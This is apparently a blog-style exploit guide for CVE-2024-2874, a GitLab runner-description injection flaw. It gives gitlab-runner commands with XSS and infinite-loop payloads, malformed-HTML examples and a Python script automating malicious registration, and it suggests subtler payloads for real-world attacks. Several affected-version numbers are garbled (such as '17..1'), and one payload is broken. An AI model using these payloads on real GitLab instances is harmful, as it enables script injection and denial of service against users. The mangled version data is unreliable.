CVE-2024-2874 - Disrupting GitLab with Crafted Runner Descriptions – An In-Depth Exploit Guide

---

Introduction

Earlier this year, security researchers disclosed a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) that could let malicious actors disrupt website functionality with little more than a custom-crafted runner description. The bug, tracked as CVE-2024-2874, impacts all GitLab versions before 16.10.6, 16.11 before 16.11.3, and 17. before 17..1.

This article explains the vulnerability, demonstrates a minimal proof-of-concept, and shares important mitigation steps.

What is CVE-2024-2874?

A GitLab "runner" is an agent that executes jobs. When registering a runner, users can provide a description, which is subsequently rendered in the GitLab web UI. The vulnerability arises because GitLab did not properly sanitize user-supplied descriptions for runners. With crafty input, an attacker could inject scripts or malformed HTML, breaking the way resources load—or worse, executing malicious JavaScript.

This kind of bug is usually classified as a cross-site scripting (XSS) or HTML injection issue, but in this scenario, the focus is on disrupting resource loading, which acts akin to a denial-of-service on the UI.

Upstream reference:
- GitLab Security Advisory: CVE-2024-2874

Affected Versions

| GitLab Version | Status |
|---------------------- |----------------------|
| < 16.10.6 | Vulnerable |
| 16.11. - 16.11.2 | Vulnerable |
| 17.. | Vulnerable |
| 16.10.6+ | Patched |
| 16.11.3+ | Patched |
| 17..1+ | Patched |

What Can an Attacker Do?

By registering a runner using a specially crafted description containing HTML or JavaScript, an attacker can:

Disrupt loading of some or all GitLab web resources.

- Potentially open up vectors for more advanced XSS attacks or phishing (depending on context and browser behavior).

1. Register a Runner with Malicious Description

Let's assume you’re running a vulnerable version of GitLab and have access to the runner registration token (common in many organizations).

Example of a Crafted Description

gitlab-runner register \
  --url https://gitlab.example.com/ \
  --registration-token PROJECT_REGISTRATION_TOKEN \
  --description "<img src=x onerror=alert('GitLabXSS')>" \
  --executor shell

Explanation:
- The description "<img src=x onerror=alert('GitLabXSS')>" leverages a classic XSS payload: when the UI loads the runner description, the onerror event fires and triggers an alert (replace this with more subtle payloads for real-world attacks).

2. Observe the Disruption

After registration, navigate to Project > Settings > CI/CD > Runners (*or Admin > Runners* if you’re an admin).

3. Advanced Payloads (DoS Example)

You can craft runner descriptions that reference non-existent resources, excessive scripts, or malformed tags to *disrupt* rendering:

gitlab-runner register \
  --url https://gitlab.example.com/ \
  --registration-token PROJECT_REGISTRATION_TOKEN \
  --description "<script>while(true){}</script>" \
  --executor shell

Or, simply break layouts with malformed HTML

gitlab-runner register \
  --url https://gitlab.example.com/ \
  --registration-token PROJECT_REGISTRATION_TOKEN \
  --description "</table><table><tr><td>Oops!</td></tr></table>" \
  --executor shell

Here’s a minimal Python script to automate runner registration with a malicious description

import os

# Replace these with your own values
GITLAB_URL = "https://gitlab.example.com/"
REG_TOKEN = "PROJECT_REGISTRATION_TOKEN"
DESCRIPTION = "<img src= onerror=alert('Hacked')>"

os.system(f'gitlab-runner register --non-interactive --url {GITLAB_URL} '
          f'--registration-token {REG_TOKEN} '
          f'--description "{DESCRIPTION}" --executor "shell"')

Why Does This Happen?

GitLab’s user interface wasn’t escaping or filtering HTML tags from the description fields for runners. Modern web applications must ALWAYS sanitize user-supplied input before rendering it back in a web page. In this case, GitLab fixed it by escaping or stripping HTML tags.


## How to Fix / Mitigate

Regularly review registered runners for unexpected descriptions.

GitLab’s Upgrade Announcement:
Security release: 16.10.6, 16.11.3, 17..1

Mitigation Reference:
- How to Upgrade GitLab

Conclusion

CVE-2024-2874 underlines why all user-supplied data must be carefully handled in web applications, especially those as critical as source code platforms. While GitLab quickly patched the issue, many installations might still be vulnerable.

If you manage GitLab—update, audit, and inform your team. Malicious runners don’t always look dangerous, but with clever descriptions, they can take down your project dashboard or worse.

Further Reading

- Official GitLab CVE-2024-2874 Advisory
- GitLab’s Guide on Runners
- OWASP XSS Prevention Cheat Sheet


*This analysis is exclusive to this context—please don’t exploit vulnerable systems you don’t own or have explicit permission to test.*

Timeline

Published on: 05/23/2024 07:15:08 UTC
Last modified on: 05/24/2024 01:15:30 UTC